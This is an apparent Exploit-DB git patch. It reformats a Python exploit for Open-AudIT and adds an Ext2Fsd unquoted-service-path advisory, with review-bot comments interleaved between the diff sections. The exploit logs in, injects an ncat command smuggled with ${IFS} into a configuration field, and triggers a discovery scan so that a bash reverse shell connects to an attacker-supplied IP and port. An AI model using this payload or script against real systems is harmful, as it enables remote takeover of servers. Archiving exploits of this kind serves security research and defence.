From 2f2c713a1291cbf6d84e79cc694d9dc6db4153d2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 25 Mar 2021 05:02:09 +0000
Subject: [PATCH] DB: 2021-03-25
2 changes to exploits/shellcodes
Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
---
 exploits/php/webapps/48393.py | 58 ++++++++++++++------------------
 exploits/windows/local/49706.txt | 29 ++++++++++++++++
 files_exploits.csv | 1 +
 3 files changed, 56 insertions(+), 32 deletions(-)
 create mode 100644 exploits/windows/local/49706.txt
diff --git a/exploits/php/webapps/48393.py b/exploits/php/webapps/48393.py
index de41b5a2b..b339ee5a9 100755
--- a/exploits/php/webapps/48393.py
+++ b/exploits/php/webapps/48393.py
@@ -16,44 +16,40 @@ import string
 from bs4 import BeautifulSoup
 from urllib.parse import quote
-warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
-if len(sys.argv) !=3D 6:
- print("[~] Usage : ./openaudit-exploit.py url username password ip port=
-")
+if len(sys.argv) != 6:
+ print("[~] Usage : ./openaudit-exploit.py url username password ip port")
 exit()
-url =3D sys.argv[1]
-username =3D sys.argv[2]
-password =3D sys.argv[3]
-ip =3D sys.argv[4]
-port =3D sys.argv[5]
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
-request =3D requests.session()
+request = requests.session()
 def inject_payload():
- configuration_path =3D url+"/en/omk/open-audit/configuration/90"
- data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
-:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
-port)
+ configuration_path = url+"/en/omk/open-audit/configuration/90"
+ data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
 request.patch(configuration_path, data)
 print("[+] Payload injected in settings")
 def start_discovery():
- discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
- post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
- scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
-ange(10)])
- req =3D request.get(discovery_path)
+ discovery_path = url+"/en/omk/open-audit/discoveries/create"
+ post_discovery_path = url+"/en/omk/open-audit/discoveries"
+ scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
+ req = request.get(discovery_path)
- response =3D req.text
- soup =3D BeautifulSoup(response, "html5lib")
- token =3D soup.findAll('input')[5].get("value")
- buttons =3D soup.findAll("button")
- headers =3D {"Referer" : discovery_path}
- request_data =3D {
+ response = req.text
+ soup = BeautifulSoup(response, "html5lib")
+ token = soup.findAll('input')[5].get("value")
+ buttons = soup.findAll("button")
+ headers = {"Referer" : discovery_path}
+ request_data = {
 "data[attributes][name]":scan_name,
 "data[attributes][other][subnet]":"10.10.10.1/24",
 "data[attributes][other][ad_server]":"",
@@ -101,23 +97,21 @@ ange(10)])
 }
 print("[+] Creating discovery ..")
- req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
-=3Dheaders, allow_redirects=3DFalse)
- disocvery_url =3D url + req.headers['Location'] + "/execute"
+ req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
+ disocvery_url = url + req.headers['Location'] + "/execute"
 print("[+] Triggering payload ..")
 print("[+] Check your nc ;)")
 request.get(disocvery_url)
 def login():
- login_info =3D {
+ login_info = {
 "redirect_url": "/en/omk/open-audit",
 "username": username,
 "password": password
 }
- login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
-fo)
- login_text =3D login_request.text
+ login_request = request.post(url+"/en/omk/open-audit/login", login_info)
+ login_text = login_request.text
 if "There was an error authenticating" in login_text:
 return False
 else:
diff --git a/exploits/windows/local/49706.txt b/exploits/windows/local/49706.txt
new file mode 100644
index 000000000..af96bc3e4
--- /dev/null
+++ b/exploits/windows/local/49706.txt
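Review bot: `token = soup.findAll('input')[5].get("value")` on the new side still selects the hidden form field by position, so any difference in the rendered form (extra field, different version) silently yields the wrong value or raises IndexError; looking the input up by its `name` attribute (which this hunk does not show) would be less brittle, and `req = request.get(discovery_path)` is parsed without a glance at `req.status_code`. The commit only decodes the quoted-printable `=3D` sequences and soft line breaks, so both points pre-date it and are carried over unchanged. `token` and `buttons` are assigned here but their use, if any, lies outside the hunk; start_discovery and the request_data dict continue past it.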
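Review bot: `disocvery_url = url + req.headers['Location'] + "/execute"` reads the header unconditionally, so when the POST does not answer with a redirect (the call passes `allow_redirects=False`, and a non-redirect answer carries no Location) the script dies with a bare KeyError instead of a readable message; a guard such as `if 'Location' not in req.headers: print("[-] No redirect from discovery create"); exit()` before that line would be clearer. The new line also keeps the misspelling `disocvery_url` from the old side; it is a local used once, two lines later, so renaming it `discovery_url` in both places is free. login()'s body continues past the hunk.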
@@ -0,0 +1,29 @@
+# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
+# Date: 2021-1-19
+# Exploit Author: Mohammed Alshehri
+# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download
+# Version: 0.68
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc Ext2Srv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Ext2Srv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Ext2 Management Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b4a436b97..439bfc307 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
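Review bot: The closing sentence `This vulnerability could permit executing code during startup or reboot with the escalated privileges.` states the impact but not what the `sc qc` output actually shows or what fixes it, which is what a reader triaging this advisory needs. Since the finding rests on the unquoted, space-containing `BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe` running as `SERVICE_START_NAME : LocalSystem` with `START_TYPE : 2 AUTO_START`, a short line naming that combination and the remediation, quoting the image path in the service configuration and keeping `C:\Program Files\` and the install directory non-writable for standard users, would make the entry self-contained. The `# Date: 2021-1-19` header also differs from the `2021-03-24` date in the index line added to files_exploits.csv; whether that is intentional is not clear from the page.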
@@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port
 49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
+49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139